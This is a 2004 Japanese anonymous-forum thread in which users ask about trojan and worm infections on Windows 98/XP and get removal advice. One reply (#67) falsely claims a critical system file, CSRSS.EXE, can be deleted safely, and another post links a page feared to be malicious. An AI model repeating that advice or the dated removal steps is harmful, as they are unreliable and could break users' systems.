削除されているなど、どうしようもない状態。
このスレの人ならこの状態になった時はどうするのですか?
私は友人と考えたのですが、何も思いつきませんでした。
39 :名無しさん@お腹いっぱい。:04/09/07 01:48
>>38
システムの復元ができるXPとかなら、システムの復元かな。
復元不能なら、俺ならリカバリしてアンチウィルスソフトやアンチスパイウェアソフトを
最初から入れてしっかり予防しておく。WindowsUpdateもきっちりやる。
システムの復元ができるXPとかなら、システムの復元かな。
復元不能なら、俺ならリカバリしてアンチウィルスソフトやアンチスパイウェアソフトを
最初から入れてしっかり予防しておく。WindowsUpdateもきっちりやる。
40 :名無しさん@お腹いっぱい。:04/09/07 03:05
友人のPCがウイルスに感染したみたいなのですが、
ノートンとバスター(どちらも体験版)でも検索にひっかかりませんでした。
症状としましては、どこからか拾って来た仮装CDファイルをデーモンツールに
入れて起動したらドラクエのデータが消える音と共に画面が
赤くなって動かなくなってしまうみたいです。
何度も再起動しても起動後同じ症状がでるみたいです。
OSはwindows98です。
対処方等知っている方がおられましたらどうかおしえてください。
ノートンとバスター(どちらも体験版)でも検索にひっかかりませんでした。
症状としましては、どこからか拾って来た仮装CDファイルをデーモンツールに
入れて起動したらドラクエのデータが消える音と共に画面が
赤くなって動かなくなってしまうみたいです。
何度も再起動しても起動後同じ症状がでるみたいです。
OSはwindows98です。
対処方等知っている方がおられましたらどうかおしえてください。
41 :名無しさん@お腹いっぱい。:04/09/07 03:08
42 :40:04/09/07 03:40
早速のレスありがとうございます。
友人にこのスレの事言っていたので、レスを見たらしくもうしないとメールいれてきました。
この度はありがとうございました。
友人にこのスレの事言っていたので、レスを見たらしくもうしないとメールいれてきました。
この度はありがとうございました。
43 :名無しさん@お腹いっぱい。:04/09/07 09:29
>>30
多分SASSER以外もいるよ
多分SASSER以外もいるよ
44 :名無しさん@お腹いっぱい。:04/09/07 09:53
友人が〜知人が〜と前振りする香具師の大半は
自分のことを他人に置き換えて質問している
自分のことを他人に置き換えて質問している
45 :名無しさん@お腹いっぱい。:04/09/07 10:25
>>45
だから?と釣られてみる
だから?と釣られてみる
46 :名無しさん@お腹いっぱい。:04/09/07 11:02
>>4
自分にレスしてどうする?とさらに釣られてみる
自分にレスしてどうする?とさらに釣られてみる
47 :名無しさん@お腹いっぱい。:04/09/07 11:07
48 :名無しさん@お腹いっぱい。:04/09/07 11:14
49 :名無しさん@お腹いっぱい。:04/09/07 17:32
すいません、質問させてください
受信と送信のバイト数が
送信のほうが圧倒的に多いのですが、(ネットに繋げただけで何もしてない状態で)
これは何かトロイ系に感染していじられているのでしょうか?
AD-awereやavasでスキャンしたときは何も見つからなかったのですが。
受信と送信のバイト数が
送信のほうが圧倒的に多いのですが、(ネットに繋げただけで何もしてない状態で)
これは何かトロイ系に感染していじられているのでしょうか?
AD-awereやavasでスキャンしたときは何も見つからなかったのですが。
50 :名無しさん@お腹いっぱい。:04/09/07 18:12
>>49
明らかに怪しいな、と思ったら何で他のフリーソフトも試してみないの?
それだけの情報でトロイに感染したかどうかなんてわかるかよ
ファイヤーウォールは入っているのか、何か変なものが接続しようとしてないか?
Spybotは試したのか?アンチトロイウェアソフトは試してみたのか?
明らかに怪しいな、と思ったら何で他のフリーソフトも試してみないの?
それだけの情報でトロイに感染したかどうかなんてわかるかよ
ファイヤーウォールは入っているのか、何か変なものが接続しようとしてないか?
Spybotは試したのか?アンチトロイウェアソフトは試してみたのか?
51 :名無しさん@お腹いっぱい。:04/09/08 09:29
あげ
52 :名無しさん@お腹いっぱい。:04/09/08 10:59
誘導されてきました。
OSはXPなんですが、この方法について質問があります。
■FAQ.4
Q.レジストリエディタをメモ帳に書き換えられてしまいました。どうやったら元に戻せますか?
1.OSのインストールディスクからオリジナルの regedit.exe を探し出す。
◆XPの場合→インストールディスクの入ったドライブをD:とするとD:\I386\REGEDIT.EXE
2.今あるregedit.exeをオリジナルで上書きする。
◆XP/2000/Meの場合→C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き
>2.今あるregedit.exeをオリジナルで上書きする。
オリジナルまでいって、
「C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き」
がよくわからないんですが、
「C:\Windows\system32\dllcache\regedit.exe」を「C:\Windows\ regedit.exe」に上書きするってことですか?
OSはXPなんですが、この方法について質問があります。
■FAQ.4
Q.レジストリエディタをメモ帳に書き換えられてしまいました。どうやったら元に戻せますか?
1.OSのインストールディスクからオリジナルの regedit.exe を探し出す。
◆XPの場合→インストールディスクの入ったドライブをD:とするとD:\I386\REGEDIT.EXE
2.今あるregedit.exeをオリジナルで上書きする。
◆XP/2000/Meの場合→C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き
>2.今あるregedit.exeをオリジナルで上書きする。
オリジナルまでいって、
「C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き」
がよくわからないんですが、
「C:\Windows\system32\dllcache\regedit.exe」を「C:\Windows\ regedit.exe」に上書きするってことですか?
53 :名無しさん@お腹いっぱい。:04/09/08 10:59
Win32/Pariteとかいうのに感染した場合どうすればいいのですか?
54 :名無しさん@お腹いっぱい。:04/09/08 13:53
>52
2.の文面を読む限り書いてある順番で両方の箇所のregedit.exeを1.のオリジナルで上書きするんだと思うぞ
2.の文面を読む限り書いてある順番で両方の箇所のregedit.exeを1.のオリジナルで上書きするんだと思うぞ
55 :名無しさん@お腹いっぱい。:04/09/08 13:54
>53
アンチウイルスソフトで駆除してください
アンチウイルスソフトで駆除してください
56 :名無しさん@お腹いっぱい。:04/09/08 14:51
VAIOを買った際にプリインストールされていた、「Norton AntiVirus 2003」を使用しています。
そろそろ更新サービスの期限が切れるので、ストアでキーを購入しようとしているところなんですが…。
この際2004をダウンロード版を買ってアップグレードした方がいいでしょか?
そろそろ更新サービスの期限が切れるので、ストアでキーを購入しようとしているところなんですが…。
この際2004をダウンロード版を買ってアップグレードした方がいいでしょか?
57 :名無しさん@お腹いっぱい。:04/09/08 18:49
ここはアンチウィルスソフトの相談所じゃねーぞ
58 :名無しさん@お腹いっぱい。:04/09/08 21:08
>>52
ダウソ板に池
ダウソ板に池
60 :名無しさん@お腹いっぱい。:04/09/09 00:38
パソコンがウイルス感染したため、クリーンインストールしました。
その後、スクリーンセイバーを設定しようとしたところ、元から入っている、
「60年代アメリカ」と、「サイエンス」というのを見たところ、
台風みたいなのが画面を動き回るのと、ボカシの入った丸いのが画面を
動き回るのでした。
ウイルス関連の書籍でこのようなウイルスもあると読んだことがあるのですが、
このスクリーンセイバーもウイルス感染しているのでしょうか?
それとも、元々このようなスクリーンセイバーなのでしょうか?
ちなみに、Windows98使用でNECのパソコンを使ってます。
その後、スクリーンセイバーを設定しようとしたところ、元から入っている、
「60年代アメリカ」と、「サイエンス」というのを見たところ、
台風みたいなのが画面を動き回るのと、ボカシの入った丸いのが画面を
動き回るのでした。
ウイルス関連の書籍でこのようなウイルスもあると読んだことがあるのですが、
このスクリーンセイバーもウイルス感染しているのでしょうか?
それとも、元々このようなスクリーンセイバーなのでしょうか?
ちなみに、Windows98使用でNECのパソコンを使ってます。
61 :名無しさん@お腹いっぱい。:04/09/09 01:07
>>60
元々そうだと思うけど、不安ならコッチの方がよさげ↓
Windows9X・Me質問スレッド Part42
http://pc5.2ch.net/test/read.cgi/win/1092667061/l50
元々そうだと思うけど、不安ならコッチの方がよさげ↓
Windows9X・Me質問スレッド Part42
http://pc5.2ch.net/test/read.cgi/win/1092667061/l50
62 :名無しさん@お腹いっぱい。:04/09/09 03:25
torjan horseとかいうウィルスに感染しました。
norton anti virus2002を使って駆除しようとしましたができません
どうしたらいいでしょうか?
詳しい方教えてください
norton anti virus2002を使って駆除しようとしましたができません
どうしたらいいでしょうか?
詳しい方教えてください
63 :名無しさん@お腹いっぱい。:04/09/09 03:30
>>62
駆除じゃなくてファイルを削除だ
駆除じゃなくてファイルを削除だ
64 :名無しさん@お腹いっぱい。:04/09/09 03:34
感染しているファイルを削除しようとしても
使用中で削除できませんとでてきます
使用中で削除できませんとでてきます
65 :名無しさん@お腹いっぱい。:04/09/09 03:37
つか、ウイルス名がtrojan horseなの?
66 :名無しさん@お腹いっぱい。:04/09/09 03:44
>63
ちなみに感染しているファイルはCSRSS.EXEとCSRSS 2.DLL
なんだけど削除して問題ないのかな?
ウィルス名 がtrojan horseです
ちなみに感染しているファイルはCSRSS.EXEとCSRSS 2.DLL
なんだけど削除して問題ないのかな?
ウィルス名 がtrojan horseです
67 :名無しさん@お腹いっぱい。:04/09/09 06:41
>>66
削除して再起動すれば自動的に新しいファイルが作られる。それでOK.
削除して再起動すれば自動的に新しいファイルが作られる。それでOK.
68 :名無しさん@お腹いっぱい。:04/09/09 11:04
YBBってユーザーのウイルス対策どないなってんねん。
3回連絡してその都度対処するっていってんのに2ヶ月以上も
同じユーザーから毎日10以上届くぞ。
3回連絡してその都度対処するっていってんのに2ヶ月以上も
同じユーザーから毎日10以上届くぞ。
69 :名無しさん@お腹いっぱい。:04/09/09 11:16
>>67
こらーっ!!!
こらーっ!!!
70 :名無しさん@お腹いっぱい。:04/09/09 11:35
>>66
そのウイルス新しいな。いいないいな♪
それはトロイだからレジストリがいじられていて自動的にプログラムが起動されているわけ
んでもってまずはそのプログラム名を探すか、怪しそうなのをみつけて終了させれば削除は可能になる。
次にレジストリの中の
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
から同じようにそのプログラムを実行してるやつを消す。
ノートン先生がちゃんとした削除方法とかを出すまではなんともいえないが
検出されたファイル名(.exe)=プログラム名と考えて
またそのファイルのパスをレジストリでのデータ欄と比べればだいたいみつかる。
そのウイルス新しいな。いいないいな♪
それはトロイだからレジストリがいじられていて自動的にプログラムが起動されているわけ
んでもってまずはそのプログラム名を探すか、怪しそうなのをみつけて終了させれば削除は可能になる。
次にレジストリの中の
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
から同じようにそのプログラムを実行してるやつを消す。
ノートン先生がちゃんとした削除方法とかを出すまではなんともいえないが
検出されたファイル名(.exe)=プログラム名と考えて
またそのファイルのパスをレジストリでのデータ欄と比べればだいたいみつかる。
71 :ぼるじょあ ◆yBEncckFOU :04/09/09 12:16
72 :名無しさん@お腹いっぱい。:04/09/09 15:28
ネットの反応速度が遅い、マウスを動かしてもカーソルがすぐに移動しない、
メール画面にするとすぐにフリーズします。
1週間程まえに5通の不信メールが届きうっかり2通を開けてしまったのですが、
そのメールが届く少しまえからパソコンの調子が変でした。
販売店やメーカーに聞くとウイルスの可能性もあるが、何年もパソコンを使ってると
ウイルスでなくても動作に異常が出るのでたまに初期化したほうがいいかも知れない
と言われました。
どうすればいいですか?
ちなみにさっきパンダのHPに接続しようとしましたが表示されませんでした。
メール画面にするとすぐにフリーズします。
1週間程まえに5通の不信メールが届きうっかり2通を開けてしまったのですが、
そのメールが届く少しまえからパソコンの調子が変でした。
販売店やメーカーに聞くとウイルスの可能性もあるが、何年もパソコンを使ってると
ウイルスでなくても動作に異常が出るのでたまに初期化したほうがいいかも知れない
と言われました。
どうすればいいですか?
ちなみにさっきパンダのHPに接続しようとしましたが表示されませんでした。
73 :名無しさん@お腹いっぱい。:04/09/09 15:39
>72
素直にリカバリ
素直にリカバリ
74 :名無しさん@お腹いっぱい。:04/09/09 17:31
>70 どうやって怪しそうなプログラムをみつけるの?難しそうだからリカバリーでもいいのかな
76 :名無しさん@お腹いっぱい。:04/09/09 21:20
wingr32.exe ってのを昨日捕獲しました。
進入方法はサッサーと同じような感じです。オンラインアップデート中にやられました(^^;
最初サッサーかなぁっと思ったのでオンラインスキャンなど試したんですが、検出されませんでした。
さらに拡散するためにサッサーと同じport445を叩いて進入するような動きをみせてました。
port445を使っていたので、完全にサッサーと思い込んでいてそこがミソでしたね。
んで進入後はあやしげなホスト名のport6667へむけてパケットを放出してました。
バックドアにでもしようとしたのでしょうかね?
ちなみに
2kでは
C:\WINNT\system32
ここにありました。
xpでは
c:\windows\system32
にありました。
あとはレジストリの自動実行などにもありました。
あとwinsr32.exeって名前で同じ挙動をしめすのも確認してます。
あとwinxp32.exeだったかな?ってのもありました。
以上参考までに。
進入方法はサッサーと同じような感じです。オンラインアップデート中にやられました(^^;
最初サッサーかなぁっと思ったのでオンラインスキャンなど試したんですが、検出されませんでした。
さらに拡散するためにサッサーと同じport445を叩いて進入するような動きをみせてました。
port445を使っていたので、完全にサッサーと思い込んでいてそこがミソでしたね。
んで進入後はあやしげなホスト名のport6667へむけてパケットを放出してました。
バックドアにでもしようとしたのでしょうかね?
ちなみに
2kでは
C:\WINNT\system32
ここにありました。
xpでは
c:\windows\system32
にありました。
あとはレジストリの自動実行などにもありました。
あとwinsr32.exeって名前で同じ挙動をしめすのも確認してます。
あとwinxp32.exeだったかな?ってのもありました。
以上参考までに。
77 :名無しさん@お腹いっぱい。:04/09/09 21:44
質問であります。 オンラインウィルスチェック(トレンドマイクロ)→トロイ発見→HP飛んで指示の通りにスル。
トロイの居場所はドライブCのウインドウズのダウンロードプログラムファイルの中。
で、コレって一時ファイルだっけ?とか思って勝手に
ディスククリーンアップ→全部チェック付けて実行。
で、モウ一回 オンラインウィルスチェック→トロイいなくなってた。
でも、ドライブCのウインドウズのダウンロードプログラムファイルの中は変わってナヒ・・・
コレでいいんでしょうか・・・? 不安デス。
トロイの居場所はドライブCのウインドウズのダウンロードプログラムファイルの中。
で、コレって一時ファイルだっけ?とか思って勝手に
ディスククリーンアップ→全部チェック付けて実行。
で、モウ一回 オンラインウィルスチェック→トロイいなくなってた。
でも、ドライブCのウインドウズのダウンロードプログラムファイルの中は変わってナヒ・・・
コレでいいんでしょうか・・・? 不安デス。
78 :名無しさん@お腹いっぱい。:04/09/09 21:46
1,2行目の間の文が消えてたorz
後はトロイを消すだけだーってトコまできてから、コノ作業をしますた。
後はトロイを消すだけだーってトコまできてから、コノ作業をしますた。
79 :名無しさん@お腹いっぱい。:04/09/09 22:22
何かね、最近、検出されたトロイ名は?とか、どこに検出されたのか具体的に書け!とか
変わってないって具体的にどういうこと?とか、シマンテックのオンラインスキャンもしてみ
ろ!とかアンチウイルスソフト常駐中させてねーのかよ!?といったツッコミも書き込む
気力がないんだ・・・。鬱かなぁ・・・。メンヘル版でも逝ってみるか・・・。
変わってないって具体的にどういうこと?とか、シマンテックのオンラインスキャンもしてみ
ろ!とかアンチウイルスソフト常駐中させてねーのかよ!?といったツッコミも書き込む
気力がないんだ・・・。鬱かなぁ・・・。メンヘル版でも逝ってみるか・・・。
80 :名無しさん@お腹いっぱい。:04/09/09 22:38
81 :名無しさん@お腹いっぱい。:04/09/09 22:39
偉いスンマセンorz
ウインドウズXPホームエディション使ってマス
トロイ名はTROJ_ISTBAR.Wで、別名はTR/Dldr.IstBar.PT, アイエスティバー
検出された場所はドライブCのウインドウズのダウンロードプログラムファイルの中デス。
ファイルを開いた時に出てくる中身、が変わってないので、本当に消えたのか心配、という事です。
シマンテックはその後やりましたが、検出されませんでした。
アンチは常駐させてません・・・
不備非常に申し訳ないです。 というかタブンまだ不備がありそうです・・・お手数かけて申し訳ないorz
ウインドウズXPホームエディション使ってマス
トロイ名はTROJ_ISTBAR.Wで、別名はTR/Dldr.IstBar.PT, アイエスティバー
検出された場所はドライブCのウインドウズのダウンロードプログラムファイルの中デス。
ファイルを開いた時に出てくる中身、が変わってないので、本当に消えたのか心配、という事です。
シマンテックはその後やりましたが、検出されませんでした。
アンチは常駐させてません・・・
不備非常に申し訳ないです。 というかタブンまだ不備がありそうです・・・お手数かけて申し訳ないorz
82 :名無しさん@お腹いっぱい。:04/09/09 22:43
>>79
いっそツッコミもテンプレ化したらどうだ?
いっそツッコミもテンプレ化したらどうだ?
83 :名無しさん@お腹いっぱい。:04/09/09 22:46
84 :名無しさん@お腹いっぱい。:04/09/09 22:49
>>81
http://members.at.infoseek.co.jp/yas1091/R3_temp.swf?inputStr=%82%D4%82%C1%82%BF%82%E1%82%AF%82%BB%82%CC%83E%83C%83%8B%83X%89B%82%B5%83t%83@%83C%83%8B%82%C9%82%C8%82%C1%82%C4%82%BD%82%F1%82%B6%82%E1%82%CB%81%5B%82%CC%81H
http://members.at.infoseek.co.jp/yas1091/R3_temp.swf?inputStr=%82%D4%82%C1%82%BF%82%E1%82%AF%82%BB%82%CC%83E%83C%83%8B%83X%89B%82%B5%83t%83@%83C%83%8B%82%C9%82%C8%82%C1%82%C4%82%BD%82%F1%82%B6%82%E1%82%CB%81%5B%82%CC%81H
>>82
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
↑こんな感じ?別スレのを修正したんだけど。
あぁ〜鬱だぁ〜・・・。
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
↑こんな感じ?別スレのを修正したんだけど。
あぁ〜鬱だぁ〜・・・。
86 :名無しさん@お腹いっぱい。:04/09/09 23:37
>>85
イキロ…って鬱な人には言っちゃダメなんだっけか?
【使用OS、WindowsUpdateの有無】
【使用AntiVirus、Updateの有無】
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
【これまでにとった措置】
ちょっと修正。
とりあえずテンプレに入れてみるとか。
イキロ…って鬱な人には言っちゃダメなんだっけか?
【使用OS、WindowsUpdateの有無】
【使用AntiVirus、Updateの有無】
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
【これまでにとった措置】
ちょっと修正。
とりあえずテンプレに入れてみるとか。
88 :名無しさん@お腹いっぱい。:04/09/10 00:20
【使用OS】WinXPSP2
【WindowsUpdateしてるか】している。
【AntiVirusは何を使っているか】eTrust、アンチドート。
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】アンチドートで、
C:\〜\Temporary Internet Files\Content.IE5\FGQEOO6Y\stage[1].htm = ウイルス感染 : JS.Milala.a
eTrust:感染なし
【別のオンラインスキャンしたならその結果は】
トレンド:感染なし
シマンテック:感染なし
【症状を具体的に、分かる限りすべて書く】
異常見当たらず。
【何をしたらそんなことになったのか】
分からない。
【これまでにとった措置】
\Content.IE5 を探した。なかった。
「JS Milala」 をググッタ。良く分からなかった。JS.Amilala.aと言われてる人がいた。
>>7のA.2ので milala を探した。なかった。
【その他の質問】
これなんですか?
どうやって駆除するんですか?
【WindowsUpdateしてるか】している。
【AntiVirusは何を使っているか】eTrust、アンチドート。
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】アンチドートで、
C:\〜\Temporary Internet Files\Content.IE5\FGQEOO6Y\stage[1].htm = ウイルス感染 : JS.Milala.a
eTrust:感染なし
【別のオンラインスキャンしたならその結果は】
トレンド:感染なし
シマンテック:感染なし
【症状を具体的に、分かる限りすべて書く】
異常見当たらず。
【何をしたらそんなことになったのか】
分からない。
【これまでにとった措置】
\Content.IE5 を探した。なかった。
「JS Milala」 をググッタ。良く分からなかった。JS.Amilala.aと言われてる人がいた。
>>7のA.2ので milala を探した。なかった。
【その他の質問】
これなんですか?
どうやって駆除するんですか?
89 :名無しさん@お腹いっぱい。:04/09/10 00:24
ANTIDOTEはすげえ誤検出多いから、ウイルスと判定してもウイルスじゃないことはよくある
90 :名無しさん@お腹いっぱい。:04/09/10 00:28
eTrustもアンチドートもよー知らんのだが、アンチウイルスソフト
二つ入れるって、アカンのとちゃうの。
二つ入れるって、アカンのとちゃうの。
91 :名無しさん@お腹いっぱい。:04/09/10 00:29
92 :名無しさん@お腹いっぱい。:04/09/10 00:33
93 :名無しさん@お腹いっぱい。:04/09/10 01:00
>>91
どうも。削除しました。
どうも。削除しました。
94 :名無しさん@お腹いっぱい。:04/09/10 10:56
>85,86
テンプレ乙
テンプレ乙
95 :名無しさん@お腹いっぱい。:04/09/10 13:23
thumbs.dbってトロイに関係あるファイルですか?プログラムファイルの中に見つけてしまった。いつのまに…
96 :名無しさん@お腹いっぱい。:04/09/10 13:31
>95
>86
>86
97 :名無しさん@お腹いっぱい。:04/09/10 14:54:38
98 :名無しさん@お腹いっぱい。:04/09/10 20:47:49
母のパソコンがあぼーんしそうなので助けてください。
【使用OS、WindowsUpdateの有無】していない。
【使用AntiVirus、Updateの有無】ウイルスバスター2004
【スキャンした結果(ウイルス名・発見場所)】スキャンしたが発見できず。
【症状】メールやグーグル検索で文字を入力すると、iiiiiiiiiiiiiiiと勝手に
文字を打ってしまうらしいのです。ウイルスなのかも分からない。
【使用OS、WindowsUpdateの有無】していない。
【使用AntiVirus、Updateの有無】ウイルスバスター2004
【スキャンした結果(ウイルス名・発見場所)】スキャンしたが発見できず。
【症状】メールやグーグル検索で文字を入力すると、iiiiiiiiiiiiiiiと勝手に
文字を打ってしまうらしいのです。ウイルスなのかも分からない。
すみません。慌てていたので忘れてしまいました。
OSはMeです。宜しくお願いします。
OSはMeです。宜しくお願いします。
100 :名無しさん@お腹いっぱい。:04/09/10 20:58:19
101 :名無しさん@お腹いっぱい。:04/09/10 21:21:39
質問です。
ぬるぽにかかったんですが、色々あってリカバリしまして、ぬるぽはなくなりました。
しかし、Dドライブのjpgだけが全て152MBになってて、
「プレビューを利用できません」ってなります。
ノートンでスキャンしても何も検出されませんでした。
どうか解決策を教えてください<(_ _)>
ぬるぽにかかったんですが、色々あってリカバリしまして、ぬるぽはなくなりました。
しかし、Dドライブのjpgだけが全て152MBになってて、
「プレビューを利用できません」ってなります。
ノートンでスキャンしても何も検出されませんでした。
どうか解決策を教えてください<(_ _)>
102 :名無しさん@お腹いっぱい。:04/09/10 21:36:25
>>101
マルチは氏ね
マルチは氏ね
103 :名無しさん@お腹いっぱい。:04/09/10 21:58:17
>>101
セキュ板じゃnyの質問はご法度だし、ダウン板でもその質問じゃなー。
jpg上書きされたんで修復は不可能、以上。
あとはここ読め↓
【警報】Winnyを狙ったワーム・ウイルス情報
http://www.geocities.jp/kemkzuenc/Antinny.html
それから、今後ny系の質問はダウン板でするように。
セキュ板じゃnyの質問はご法度だし、ダウン板でもその質問じゃなー。
jpg上書きされたんで修復は不可能、以上。
あとはここ読め↓
【警報】Winnyを狙ったワーム・ウイルス情報
http://www.geocities.jp/kemkzuenc/Antinny.html
それから、今後ny系の質問はダウン板でするように。
104 :名無しさん@お腹いっぱい。:04/09/10 22:13:28
105 :名無しさん@お腹いっぱい。:04/09/10 22:24:29
>104
律儀なやつだな
律儀なやつだな
106 :名無しさん@お腹いっぱい。:04/09/11 03:15:44
>>105
ですね。あげ
ですね。あげ
107 :名無しさん@お腹いっぱい。:04/09/11 06:53:22
あるホームページの掲示板に頻繁に書き込みをしていました。
(やや辛口のコメントでそれなり反発を買っていたかも)
ここ最近 そのサイトを見ているときはなんでもないのですが
その後 パソコンの電源を入れた時、ブラウザ(IE)がハングアップ
しまいにはネットをつなぐことさえできなくなりました。
パソコンを空にして直すしかなくて(泣)繰り返した結果
どう考えてもそのサイトのアクセス後に不調をきたして
いるようにしか思えませんでした。
ネカフェや友達の家のPCからアクセスでは異常なしでした。
が、家にある2台のPCからの時は 異常が起こりました。
そこで質問です。
サイト管理者が 私のネット接続にのみアタックをかける
ような設定は可能でしょうか?
(やや辛口のコメントでそれなり反発を買っていたかも)
ここ最近 そのサイトを見ているときはなんでもないのですが
その後 パソコンの電源を入れた時、ブラウザ(IE)がハングアップ
しまいにはネットをつなぐことさえできなくなりました。
パソコンを空にして直すしかなくて(泣)繰り返した結果
どう考えてもそのサイトのアクセス後に不調をきたして
いるようにしか思えませんでした。
ネカフェや友達の家のPCからアクセスでは異常なしでした。
が、家にある2台のPCからの時は 異常が起こりました。
そこで質問です。
サイト管理者が 私のネット接続にのみアタックをかける
ような設定は可能でしょうか?
108 :名無しさん@お腹いっぱい。:04/09/11 07:01:38
107です。ごめんなさい。板間違いだったかも(;;)
初心者質問用スレに移します。
でも もしお答えいただけるなら この手のトラブルが
どういうプログラムなのか推察いただけると助かります。
(avast,Outpostセキュで入れています)お願いします。
初心者質問用スレに移します。
でも もしお答えいただけるなら この手のトラブルが
どういうプログラムなのか推察いただけると助かります。
(avast,Outpostセキュで入れています)お願いします。
109 :名無しさん@お腹いっぱい。:04/09/11 08:12:01
110 :名無しさん@お腹いっぱい。:04/09/11 11:00:30
ウイルスかどうか不明なのですが、会社で下記の症状が出ていたと
いうことなのですが、原因の心当たりがあれば、教えてくだされ
【使用OS】WinXP と Win2000
【WindowsUpdateしてるか】一部しているようだが最新にはしていな模様。
【AntiVirusは何を使っているか】Virus Scan
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】
VirusScanでは何も検出されず
Norton AntiVirusのお試し版でやっても何も検出せず
【別のオンラインスキャンしたならその結果は】
感染拡大の可能性があるのでやってません
【症状を具体的に、分かる限りすべて書く】
金曜の夕方から発生
lsass.exeの強制終了で再起動が繰り返されたとの証言(私は確認して
いないが、複数の目撃証言あり)
複数の部署のパソコンで同様の現象が報告(報告部署には直ぐにネット
からの切り離しを依頼)
一部のノートパソコンを収容して起動したところ、上記の症状が2〜
3度確認されるが、その後、症状が消失し、何も異常なし
【何をしたらそんなことになったのか】
不明
ある部署は、あるホームページを見に行った後から異常発生とのこと
【これまでにとった措置】
上記のアンチウイルスソフト以外に、SasserとKorgoの専用駆除ソフトを
試すが、やはり検出されず
新種のウイルスを疑い、シマンテック、トレンドマイクロ、Sophosの
ホームぺージを現在までモニターするも、該当しそうなもの無し
これってなんなんでしょう
いうことなのですが、原因の心当たりがあれば、教えてくだされ
【使用OS】WinXP と Win2000
【WindowsUpdateしてるか】一部しているようだが最新にはしていな模様。
【AntiVirusは何を使っているか】Virus Scan
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】
VirusScanでは何も検出されず
Norton AntiVirusのお試し版でやっても何も検出せず
【別のオンラインスキャンしたならその結果は】
感染拡大の可能性があるのでやってません
【症状を具体的に、分かる限りすべて書く】
金曜の夕方から発生
lsass.exeの強制終了で再起動が繰り返されたとの証言(私は確認して
いないが、複数の目撃証言あり)
複数の部署のパソコンで同様の現象が報告(報告部署には直ぐにネット
からの切り離しを依頼)
一部のノートパソコンを収容して起動したところ、上記の症状が2〜
3度確認されるが、その後、症状が消失し、何も異常なし
【何をしたらそんなことになったのか】
不明
ある部署は、あるホームページを見に行った後から異常発生とのこと
【これまでにとった措置】
上記のアンチウイルスソフト以外に、SasserとKorgoの専用駆除ソフトを
試すが、やはり検出されず
新種のウイルスを疑い、シマンテック、トレンドマイクロ、Sophosの
ホームぺージを現在までモニターするも、該当しそうなもの無し
これってなんなんでしょう
111 :名無しさん@お腹いっぱい。:04/09/11 11:26:16
オンラインスキャンしろよ
112 :名無しさん@お腹いっぱい。:04/09/11 12:31:48
>>110
とりあえずWindowsUpdateしてオンラインスキャン。それでウイルスいなきゃ多分平気。再起動したから必ずウイルスがいるわけではない。逆に再起動してなくても感染してることもある。
とりあえずWindowsUpdateしてオンラインスキャン。それでウイルスいなきゃ多分平気。再起動したから必ずウイルスがいるわけではない。逆に再起動してなくても感染してることもある。
113 :名無しさん@お腹いっぱい。:04/09/11 12:34:44
>>110続き
心配だったら知識のある人にレジストリとスタートアップ見てもらったら?
心配だったら知識のある人にレジストリとスタートアップ見てもらったら?
114 :名無しさん@お腹いっぱい。:04/09/11 12:35:52
ウイルスが見つからないならlsass.exeのバグっぽいが。
115 :名無しさん@お腹いっぱい。:04/09/11 12:57:11
http://otoge3.web.infoseek.co.jp/cgi-bin/img-box/img20040830064114.html
これを間違えて踏んでしまって開いてる途中で強制終了したのですが
やばいですか?駆除の仕方とかわからないですが・・・
これを間違えて踏んでしまって開いてる途中で強制終了したのですが
やばいですか?駆除の仕方とかわからないですが・・・
116 :名無しさん@お腹いっぱい。:04/09/11 13:04:48
リンクをはるなあほ
勇気のある人にまかせた↓
勇気のある人にまかせた↓
117 :名無しさん@お腹いっぱい。:04/09/11 13:40:18
>>115
OSのクリーンインストール
OSのクリーンインストール
118 :名無しさん@お腹いっぱい。:04/09/11 13:49:50
>115
ラウンジの鑑定スレいってウイルスだといわれてから
>86のテンプレ読んで出直して来い
ラウンジの鑑定スレいってウイルスだといわれてから
>86のテンプレ読んで出直して来い
119 :名無しさん@お腹いっぱい。:04/09/11 14:40:48
PCよくわからなくて、WinXPなんですけど
この前から初期化されたりいきなり電源切れたり画面が固まったりエラーメッセージ表示されまくったりするんですけど
これってなんなのかわかる人いたら教えてくださいorz
この前から初期化されたりいきなり電源切れたり画面が固まったりエラーメッセージ表示されまくったりするんですけど
これってなんなのかわかる人いたら教えてくださいorz
120 :名無しさん@お腹いっぱい。:04/09/11 15:46:38
>PCよくわからなくて
貴様の言うことがわからんのだよ
>86のテンプレ読んで出直して来い
貴様の言うことがわからんのだよ
>86のテンプレ読んで出直して来い
121 :名無しさん@お腹いっぱい。:04/09/11 16:23:52
122 :名無しさん@お腹いっぱい。:04/09/11 16:51:10
トロイの木馬に感染しました。
OSはウインドウズ98です。
どうすれば良いですか?
OSはウインドウズ98です。
どうすれば良いですか?
123 :名無しさん@お腹いっぱい。:04/09/11 17:04:18
どいつもこいつも…
>85-86のテンプレ読んで出直して来い
>85-86のテンプレ読んで出直して来い
